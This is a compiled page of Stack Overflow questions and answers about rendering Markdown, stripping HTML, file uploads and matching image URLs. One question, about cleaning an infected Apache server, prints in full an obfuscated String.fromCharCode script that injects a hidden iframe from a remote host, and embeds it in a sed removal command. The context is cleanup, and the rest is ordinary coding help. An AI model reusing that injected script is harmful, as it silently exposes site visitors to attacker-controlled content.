How can I render markdown to html with Blackfriday in Go? - templates

I have a struct like this:
type Page struct {
Content string
then I read a markdown file and assign to a variable:
data, err := ioutil.ReadFile("")
lines = string(data)
page.Content = markdownRender([]byte(lines))
The markdown file is like this:
##Hello World
###Holo Go
and then I put it into markdown render function and return a string value:
func markdownRender(content []byte) string {
htmlFlags := 0
htmlFlags |= blackfriday.HTML_USE_SMARTYPANTS
htmlFlags |= blackfriday.HTML_SMARTYPANTS_FRACTIONS
renderer := blackfriday.HtmlRenderer(htmlFlags, "", "")
extensions := 0
extensions |= blackfriday.EXTENSION_NO_INTRA_EMPHASIS
extensions |= blackfriday.EXTENSION_TABLES
extensions |= blackfriday.EXTENSION_FENCED_CODE
extensions |= blackfriday.EXTENSION_AUTOLINK
extensions |= blackfriday.EXTENSION_STRIKETHROUGH
extensions |= blackfriday.EXTENSION_SPACE_HEADERS
return string(blackfriday.Markdown(content, renderer, extensions))
and finally I call the page.Content in a html template and generate a static html:
but in the generated html it shows in the browser (I tried it in the chrome and safari) is like this (not the source code, it just shows in the page):
<p>##Hello World ###Holo Go </p>
but I want it like this
Hello World
Holo Go
So, how can I do this?

First, your markdown input is not quite right -- headings should have whitespace separating the #s from the text. You can verify this using blackfriday-tool:
$ echo ##Hello | blackfriday-tool
$ echo ## Hello | blackfriday-tool
Second, if you feed the HTML output from blackfriday into a html/template, it is going to be automatically escaped for safety.
If you trust the markdown input and blackfriday's HTML output, then you can tell the template system to trust the content by wrapping it in a html/template HTML value:
type Page struct {
Content template.HTML
err = t.ExecuteTemplate(w, "page", Page{Content: template.HTML(s)})
See for an example.


remove HTML from string via regex

how do get remove the html completely and get the remaining text
'Abdulsalami</title><style>.ag8o{position:absolute;clip:rect(434px,auto,auto,434px);}</style><div class=ag8o>Spending time doing you <a href=http://arr'
i want to get 'Abdulsalami'
what would be the regex to do that ?
A single RegEx can't match all the variations of HTML.
Try using Jsoup.
public static String html2text(String html) {
return Jsoup.parse(html).text();
or Jericho Html parser (you can download it from here -
Source htmlSource = new Source(htmlText);
Segment htmlSeg = new Segment(htmlSource, 0, htmlSource.length());
Renderer htmlRend = new Renderer(htmlSeg);

How can I post FileInfo to a web service using Yesod and Http-Conduit?

I am working with the default Yesod scaffolding project.
I have created a page that displays a simple form to upload files.
(The form will likely be created on the client using Javascript.)
For brevity, the form has a single file input:
<form method="post" action=#{UploadR}>
<input type="file" name="myfile">
<button type="submit">
My objective is to process the form data and then upload the file to a web service.
I have no trouble processing the form, my concern is interacting with the web service.
For example, given the following Yesod handler:
postUploadR :: Handler Html
postUploadR = do
mgr <- fmap httpManager getYesod
fi <- runInputPost $ ireq fileField "myfile"
let fSource = fileSource fi
fName = fileName fi
req <- parseUrl "http://webservice/upload"
let areq = req { method = methodPost
, requestBody = requestBodySourceChunked fSource
res <- httpLbs areq mgr
defaultLayout $ do
setTitle "file uploaded"
<h3> Success
<p> You uploaded #{fName}.
The webservice returns the error: fail post content-length, but everything else works as expected. Perhaps the server doesn't support a chunked request body?
I think your guess about chunked request body is correct. What you need to do is:
Stream the uploaded contents into a temporary file.
Get the size of that file.
Use requestBodySource and provide the file length and its contents.
Fortunately, steps (1) and (2) can be handled quite easily by the sinkCacheLength function. You'll end up with something like:
(fSize, fSource) <- fileSource fi $$ sinkCacheLength

sed multiline replace HTML with javascript malicious code

I've a apache server that has been infected with pieces of malicious javascript code to infect the computers that visit the web page.
What i'm trying to do is remove these pieces of malicious code using find and sed commands in a Linux server.
I have created a regular expression for sed that match almost everything but the "" end tag. It is in a new line and I can't find the way to match it as well.
The malicious code is:
<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }
Note of the writer: After creating the question, I can see that the web formatting cuts the previous sample. If you want to see the full sample of malicious javascript code, have a look at the text not bold in the next text and just add at the end of the text a "new line" and a "" html tag.
The regular expression that works for all the text but for the last "</script>" is:
**find /root/cambios -type f -exec sed -i 's#**<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }**##g' {} \;**
So, please, anyone can help to match the new line and the "" text??
Thank you in advance.
Indeed you shouldn't use regex for this task. As has been told many times in SO regex are not the proper tool for dealing with HTML manipulations as it is not a regular language. Your best bet is to use an HTML parser. For instance, the following unoptimized (but still simple) code uses Jsoup for achieving your goal:
import org.jsoup.Jsoup;
import org.jsoup.nodes.DataNode;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.nodes.Node;
public class RemoveScript {
public static void main(String args[]){
String viralContent = "Your viral content";
String inputText = "<html><head><script>" + viralContent + "</script></head><body></body></html>";
Document doc = Jsoup.parse(inputText);
Elements scripts ="script");
for(Element element : scripts) {
for (Node child: element.childNodes()) {
if (child instanceof DataNode) {
String content = ((DataNode) child).getWholeData();
if (content.equals(viralContent)) {
I'm sure other parsers can do the same very easily too.

How do I extract HTML img sources with a regular expression?

I need to extract the src element from all image tags in an HTML document.
So, the input is an HTML page and the output would be a list of URL's pointing to images:
The following is what I came up with so far:
This does not work for tags where the src isn't directly after the img tag, for example:
<img height="1px" src="spacer.gif">
Can someone help complete this regular expression? It's pretty easy, but I thought this may be a faster way to get an answer.
The following regexp snippet should work.
It looks for text that starts with <img, followed by one or more characters that are not >, then src=". It then grabs everything between that point and the next " or >.
But if at all possible, use a real HTML parser. It's more solid, and will handle edge cases much better.
You don't want to do that. Correctly parsing HTML is a very complex problem, and regular expressions are not a good tool for that.
See e.g.
Can you provide some examples of why it is hard to parse XML and HTML with a regex?
And here for a good solution:
How do I programatically inspect a HTML document
You could do this pretty easily with Javascript. An example would be like below:
var images = document.getElementsByTagName("img");
for (i=0; i < images.length; i++)
// get image src
var currImage = images[i].src;
// do link creation here
This works great for me
$regexp = '<img[^>]+src=(?:\"|\')\K(.[^">]+?)(?=\"|\')';
if(preg_match_all("/$regexp/", $content, $matches, PREG_SET_ORDER)) {
if( !empty($matches) ) {
for ($i=0; $i <= count($matches); $i++)
$img_src = $matches[$i][0];
echo $img_src;

Regex to check if valid URL that ends in .jpg, .png, or .gif

I would like users to submit a URL that is valid but also is an image, ending with .jpg, .png, or .gif.
That's a (slightly modified) version of the official URI parsing regexp from RFC 2396. It allows for #fragments and ?querystrings to appear after the filename, which may or may not be what you want. It also matches any valid domain, including localhost, which again might not be what you want, but it could be modified.
A more traditional regexp for this might look like the below.
|-------- domain -----------|--- path ---|-- extension ---|
EDIT See my other comment, which although isn't answering the question as completely as this one, I feel it's probably a more useful in this case. However, I'm leaving this here for karma-whoring completeness reasons.
Why are you checking the URL? That's no guarantee what you're going to get is an image, and no guarantee that the things you're rejecting aren't images. Try performing a HEAD request on it, and see what content-type it actually is.
In general, you're better off validating URLs using built-in library or framework functions, rather than rolling your own regular expressions to do this - see What is the best regular expression to check if a string is a valid URL for details.
If you are keen on doing this, though, check out this question:
Getting parts of a URL (Regex)
Then, once you're satisfied with the URL (by whatever means you used to validate it), you could either use a simple "endswith" type string operator to check the extension, or a simple regex like
This will mach all images from this string:
background: rgb(255, 0, 0) url(../res/img/temp/634043/original/cc3d8715eed0c.jpg) repeat fixed left top; cursor: auto;
<div id="divbg" style="background-color:#ff0000"><img id="bg" src="../res/img/temp/634043/original/cc3d8715eed0c.jpg" width="100%" height="100%" /></div>
background-image: url(../res/img/temp/634043/original/cc3d8715eed0c.png);
background: rgb(255, 0, 0) url( _d8715eed0c.jpg) repeat fixed left top; cursor: auto;
background: rgb(255, 0, 0) url( repeat fixed left top; cursor: auto;
Test your regex here:
(http(s?):)([/|.|\w|\s|-])*\.(?:jpg|gif|png) worked really well for me.
This will match URLs in the following forms:
Check this regular expression against the URLs here:
Here's the basic idea in Perl. Salt to taste.
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
#ARGV = qw(;
my $response = $ua->head( $ARGV[0] );
my( $class, $type ) = split m|/|, lc $response->content_type;
print "It's an image!\n" if $class eq 'image';
If you need to inspect the URL, use a solid library for it rather than trying to handle all the odd situations yourself:
use URI;
my $uri = URI->new( $ARGV[0] );
my $last = ( $uri->path_segments )[-1];
my( $extension ) = $last =~ m/\.([^.]+)$/g;
print "My extension is $extension\n";
Good luck, :)
If you really want to be sure, grabbing the first kilobyte or two of the given URL should be sufficient to determine everything you need to know about the image.
Here's an example of how you can get that information, using Python, and here's an example of it being put to use, as a Django form field which allows you to easily validate an image's existence, filesize, dimensions and format, given its URL.
I am working in Javascript based library (React). The below regex is working for me for the URL with image extension.
Working URL`s are:
Got the solution from:
Use FastImage - it'll grab the minimum required data from the URL to determine if it's an image, what type of image and what size.
Addition to Dan's Answer.
If there is an IP address instead of domain.
Change regex a bit. (Temporary solution for valid IPv4 and IPv6)
However this can be improved, for IPv4 and IPv6 to validate subnet range(s).
This expression will match all the image urls -
Examples -
Valid -
Invalid - |
Reference: See DecodeConfig section on the official go lang image lib docs here
I believe you could also use DecodeConfig to get the format of an image which you could then validate against const types like jpeg, png, jpg and gif ie
import (
// Package image/jpeg is not used explicitly in the code below,
// but is imported for its initialization side-effect, which allows
// image.Decode to understand JPEG formatted images. Uncomment these
// two lines to also understand GIF and PNG images:
// _ "image/gif"
// _ "image/png"
_ "image/jpeg"
func main() {
resp, err := http.Get("")
if err != nil {
defer resp.Body.Close()
data, _, err := image.Decode(resp.Body)
if err != nil {
reader := base64.NewDecoder(base64.StdEncoding, strings.NewReader(data))
config, format, err := image.DecodeConfig(reader)
if err != nil {
fmt.Println("Width:", config.Width, "Height:", config.Height, "Format:", format)
format here is a string that states the file format eg jpg, png etc
Just providing a better solution. You can just validate the uri and check the format then:
public class IsImageUriValid
private readonly string[] _supportedImageFormats =
public bool IsValid(string uri)
var isUriWellFormed = Uri.IsWellFormedUriString(uri, UriKind.Absolute);
return isUriWellFormed && IsSupportedFormat(uri);
private bool IsSupportedFormat(string uri) => _supportedImageFormats.Any(supportedImageExtension => uri.EndsWith(supportedImageExtension));
const url = "";
const acceptedImage = [".png", ".jpg", ".gif"];
const extension = url.substring(url.lastIndexOf("."));
const isValidImage = acceptedImage.find((m) => m === extension) != null;
console.log("isValidImage", isValidImage);
console.log("extension", extension);